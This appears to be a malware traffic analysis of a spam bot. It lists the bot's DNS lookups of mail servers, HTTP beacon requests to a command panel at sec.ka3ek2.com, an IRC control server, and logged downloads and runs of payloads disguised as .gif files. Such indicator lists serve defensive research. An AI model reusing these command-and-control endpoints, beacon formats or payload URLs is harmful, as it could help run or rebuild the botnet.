This malware spread through email,exe infection,injects into explorer.exe,downloads other malwares and is controled through http
sec.ka3ek2.com DNS_TYPE_A 31.44.184.232
Infected SMTP Servers used from this malware for spaming
Resolved : [mx3.hotmail.com] To [65.54.188.72]
Resolved : [mx3.hotmail.com] To [65.54.188.94]
Resolved : [mx3.hotmail.com] To [65.55.92.152]
Resolved : [mx3.hotmail.com] To [65.55.37.120]
Resolved : [mx3.hotmail.com] To [65.55.37.104]
Resolved : [mx3.hotmail.com] To [65.55.37.72]
Resolved : [mx3.hotmail.com] To [65.55.92.136]
Resolved : [mx3.hotmail.com] To [65.55.92.184]
Resolved : [mx3.hotmail.com] To [65.55.92.168]
Resolved : [mx3.hotmail.com] To [65.54.188.126]
Resolved : [mx3.hotmail.com] To [65.54.188.110]
Resolved : [mx3.hotmail.com] To [65.55.37.88]
exchange.quadranet.com DNS_TYPE_A 204.152.204.122
peercore.com.au DNS_TYPE_MX postoffice.telstra.net filter1.peerco-1.mailguard.com.au filter2.peerco-1.mailguard.com.au filter3.peerco-1.mailguard.com.au YES udp
purplecoral.com DNS_TYPE_MX aspmx4.googlemail.com aspmx5.googlemail.com aspmx.l.google.com alt1.aspmx.l.google.com alt2.aspmx.l.google.com aspmx2.googlemail.com aspmx3.googlemail.com YES udp
postoffice.telstra.net DNS_TYPE_A 203.50.2.115 203.50.40.137 203.50.90.137 YES udp
yahoo.com DNS_TYPE_MX mta7.am0.yahoodns.net mta5.am0.yahoodns.net mta6.am0.yahoodns.net YES udp
mta7.am0.yahoodns.net DNS_TYPE_A 209.191.88.254 66.94.236.34 66.94.237.64 66.94.237.139 67.195.168.230 74.6.136.65 74.6.136.244 98.139.175.225 YES udp
sbcglobal.net DNS_TYPE_MX sbcmx2.prodigy.net sbcmx3.prodigy.net sbcmx4.prodigy.net sbcmx5.prodigy.net sbcmx6.prodigy.net sbcmx7.prodigy.net sbcmx8.prodigy.net sbcmx9.prodigy.net sbcmx1.prodigy.net YES udp
ASPMX4.GOOGLEMAIL.com DNS_TYPE_A 209.85.229.27 YES
sbcmx2.prodigy.net DNS_TYPE_A 207.115.20.21 YES udp
gmail.com DNS_TYPE_MX gmail-smtp-in.l.google.com alt1.gmail-smtp-in.l.google.com alt2.gmail-smtp-in.l.google.com alt3.gmail-smtp-in.l.google.com alt4.gmail-smtp-in.l.google.com YES udp
gmail-smtp-in.l.google.com DNS_TYPE_A 74.125.127.26 YES udp
us.army.mil DNS_TYPE_MX mx.dr1.us.army.mil mx.ps1.us.army.mil mx.us.army.mil YES udp
forscom.army.mil DNS_TYPE_MX mx.conus.army.mil YES udp
mx.dr1.us.army.mil DNS_TYPE_A 143.69.243.34 YES udp
yahoo.co.in DNS_TYPE_MX mx-apac.mail.gm0.yahoodns.net YES udp
mx.conus.army.mil DNS_TYPE_A 143.85.192.16 143.85.199.16 YES udp
mx-apac.mail.gm0.yahoodns.net DNS_TYPE_A 106.10.166.54 106.10.166.52 YES udp
hotmail.com DNS_TYPE_MX mx2.hotmail.com mx3.hotmail.com mx4.hotmail.com mx1.hotmail.com YES udp
mx2.hotmail.com DNS_TYPE_A 65.55.37.104 65.55.37.120 65.55.92.136 65.55.92.152 65.55.92.168 65.55.92.184 65.54.188.72 65.54.188.94 65.54.188.110 65.54.188.126 65.55.37.72 65.55.37.88 YES udp
HTTP Conversations:
1.44.184.232:80 – [31.44.184.232]
Request: GET /spm/s_get_host.php?ver=565
Response: 200 “OK”
31.44.184.232:80 – [31.44.184.232]
Request: GET /spm/s_alive.php?id=56512448467253483541955089044298&tick=431640&ver=565&smtp=ok&sl=1&fw=0&pn=0&psr=0
Response: 200 “OK”
31.44.184.232:80 – [31.44.184.232]
Request: GET /spm/s_task.php?id=56512448467253483541955089044298&tid=45951
Response: 200 “OK”
Panel:
http://sec.ka3ek2.com/spm/
IRC:
60.190.218.97 5101
PRIVMSG #US! :[d=”http://img105.herosh.com/2012/02/12/798090902.gif” s=”34304 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0
PRIVMSG #US! :[d=”http://img105.herosh.com/2012/02/12/215475701.gif” s=”22528 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0
PRIVMSG #US! :[d=”http://img105.herosh.com/2011/11/11/901707294.gif” s=”65536 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data4.tmp” – Download retries: 0
PRIVMSG #US! :[d=”http://img102.herosh.com/2012/02/17/487386428.gif” s=”171088 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.tmp” – Download retries: 0
hosting infos:
http://whois.domaintools.com/31.44.184.232